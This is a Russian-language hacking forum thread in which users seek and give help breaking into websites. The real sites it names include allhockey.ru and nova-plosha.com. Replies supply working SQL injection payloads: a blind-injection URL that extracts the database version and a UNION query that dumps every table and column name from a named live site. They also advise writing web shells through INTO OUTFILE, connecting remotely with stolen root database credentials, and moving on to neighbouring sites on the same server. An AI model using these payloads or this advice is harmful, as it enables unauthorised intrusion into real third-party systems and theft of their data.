Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Встречал пару раз такие случаи, попробуй вместо limit использовать where или having.

    Для having обязательное условие наличие колонки в group by
     
    _________________________
    1 person likes this.
  2. Улыбайся

    Joined:
    23 Oct 2011
    Messages:
    71
    Likes Received:
    7
    Reputations:
    3
    Наткнулся на roundcube при вставки логина пишет вот что:
    IMAP Error in /usr/local/www/apache22/data/roundcube/program/include/rcube_imap.php (205): Login failed for 'or''=' from 177.167.126.19. LOGIN: Login failed.

    можно что то сделать?
     
    #22362 Улыбайся, 27 Jul 2013
    Last edited: 27 Jul 2013
  3. nicols

    nicols Banned

    Joined:
    20 Aug 2012
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    Помогите новичку:
    1.На сайте есть скуля,раскрутил но в БД нету логина админа,где он может храниться?
    2.Так же есть логин и пароль юзера(root@localhost) бд, но не знаю как подключиться(При переходе на site.com/PMA/ пришет 403 Forbidden(( и ниче сделать не могу ) .
    3.У юзера бд File_Priv=Y,читать файлы могу, но некак не могу залить шелл,везде пишет Can't create/write to file '....' (Errcode: 13)
    Также на сайте имееться файл phpinfo.php . Может он что-то подскажет...
     
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Можешь попробовать удаленно подключиться к БД, можешь найти относительный путь соседних сайтов и прям со скули залиться в них, если пасса нет в БД, но есть админка, прочитай исходники админки и посмотри откуда он берет данные от пасса. с такой скуляй много чего придумать можно, все по ситуации.
     
    _________________________
  5. Storm87

    Storm87 New Member

    Joined:
    22 Jul 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Кто знает про вредоносную программу ZmEu - ищет уязвимости? Подскажите как работает?
     
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    никто не знает, тут гавнософтом не пользуются, только ручками
     
  7. Storm87

    Storm87 New Member

    Joined:
    22 Jul 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    вот-эта чудо прога ломанула сервачок! надо мне её вычислить! для этого надо знать как она работает! верно?
     
  8. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Смотри логи - все станет понятно
     
  9. nicols

    nicols Banned

    Joined:
    20 Aug 2012
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    В том то и дело,что я не могу подключиться к БД, но имею логин и пароль к БД. Может кто знает,как можно подключиться к БД удаленно.
    И еще один вопрос:где в линуксе может храниться входы в админку сайта?
     
    #22369 nicols, 28 Jul 2013
    Last edited: 28 Jul 2013
  10. Shelling

    Shelling Banned

    Joined:
    15 Mar 2013
    Messages:
    0
    Likes Received:
    1
    Reputations:
    -5
    подключится к бд можно тем же шеллом всо залитым на любой хост там есть клиент
    пассы на вход в админку могут быть где угодно в базе или в файле и от ос(линукс,вин)тут вообще не зависит
     
  11. nicols

    nicols Banned

    Joined:
    20 Aug 2012
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    Хорошо,а если вход в пхпмайадмин по этой ссылке site.com/PMA/ то что в host писать ( site.com/PMA/ или site.com/ ?
    А где в Линуксе они хроняться?
     
  12. Shelling

    Shelling Banned

    Joined:
    15 Mar 2013
    Messages:
    0
    Likes Received:
    1
    Reputations:
    -5
    в хост писать имя сайта но не всегда мускул находиться на том же сервере на пример на мастрехосте это другой сервер по этому лучше прочитайте конфиг какойнибудь если найдёте
     
  13. exstreme

    exstreme New Member

    Joined:
    23 Feb 2013
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    привет всем
    есть SQL Inject, помогите раскрутить.
    Code:
    GET /junior/88/matches/stage/SQLInject/ HTTP/1.1
    Referer: http://allhockey.ru:80/
    На сайте фильтруются пробелы,все что пока получилось
    Code:
    /junior/88/matches/stage/'-1'UNION(SELECT(null),'<h1>test<h1>',3,4,(INTO(OUTFILE)'test.html))/
    Подправьте, что не так или посоветуйте другие варианты
     
  14. n3m1s

    n3m1s Banned

    Joined:
    28 Jul 2013
    Messages:
    20
    Likes Received:
    3
    Reputations:
    5
    Каким образом можно создать площадку для проведения атаки на буфер обмена?
    Нужна именно страница с таким кодом (на PHP), чтобы при запросе с определённым значением происходило переполнение буфера, вследствии чего появлялась ошибка (403, 228 etc.).
    Проверка входящего запроса на наличие значение не пойдёт.
     
  15. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    сайт.com/index.php?hl=ru&idd=cat&cat='
    Добавив в конце кавычку выдало следующую ошибку:
    Code:
    Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT * FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id='' ORDER BY mbmproduct.name ASC LIMIT 0,9 
    Или всё-таки должно выдать You have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right syntax to use near '1''
     
  16. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Вывод ошибок зависит от реализации выборки данных с бд, или конфигурации php.
    1,2) or 1=1 order by 10000 -- w - что выдаст ?
     
  17. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Ничего. Фильтрует
    Code:
    http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=13957%27
     
  18. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Это слепая sql.
    Её бессмысленно крутить, только по-символьно вытаскивать данные -
    http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=1%29%20or%201=1%20and%20substring%28%28version%28%29%29,1,1%29=5%20%23w
    Если что-то равно чему-то, в данном случае, первый символ версии субд=5 - выведет каталог), если нет - пустоту.
    Или при лучших обстоятельствах сделать вывод мини-шелла в диру с сайтом при соответствующих привилегиях и правах.
     
    #22378 Inoms, 29 Jul 2013
    Last edited: 29 Jul 2013
  19. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Так еще можно сделать

    http://www.nova-plosha.com/index.php?idd=jobs&jobs=36'+and+1=0+union+select+1,2,3,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),5,6,7,8,9,10,11,12,13,14,15,16+--+
     
    2 people like this.
  20. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Та я сморю бессмысленно это URL-запрос в код "отражает" и всё..

    P.S Но чувствую что там есть "дырочка", квалификации знаний не хватает
     
Thread Status:
Not open for further replies.